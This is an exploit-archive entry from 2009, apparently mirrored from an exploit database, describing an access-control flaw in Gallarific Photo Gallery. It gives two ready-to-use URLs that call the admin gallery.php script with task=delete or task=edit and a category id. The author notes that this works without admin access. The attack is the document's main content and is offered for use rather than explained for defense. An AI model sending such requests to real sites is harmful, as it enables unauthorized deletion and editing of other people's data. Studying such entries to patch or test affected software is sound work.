[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Gallarific 1.1 (gallery.php) Arbitrary Delete/Edit Category Vuln
# Published : 2009-08-12
# Author : ilker Kandemir
# Previous Title : Shorty 0.7.1b (Auth Bypass) Insecure Cookie Handling Vulnerability
# Next Title : Plume CMS 1.2.3 Multiple SQL Injection Vulnerabilities


# Gallarific Photo Gallery <= 1.0 Arbitrary Delete-Edit Category Vulnerability

//Author: iLker Kandemir -- MEFISTO

//Price : 47 $

//script demo : http://www.gallarific.com/demo/index.php

//[imhatimi.org]

----------------------------------------------------------------
//exploit :

1) http://[site]/gadmin/gallery.php?task=delete&id=1

2) http://[site]/gadmin/gallery.php?task=edit&id=1

----------------------------------------------------------------
//Note:

/* You don't need access to admin-panel ;) */

side note:
Original Advisory without poC : http://secunia.com/advisories/29399

# www.Syue.com [2009-08-12]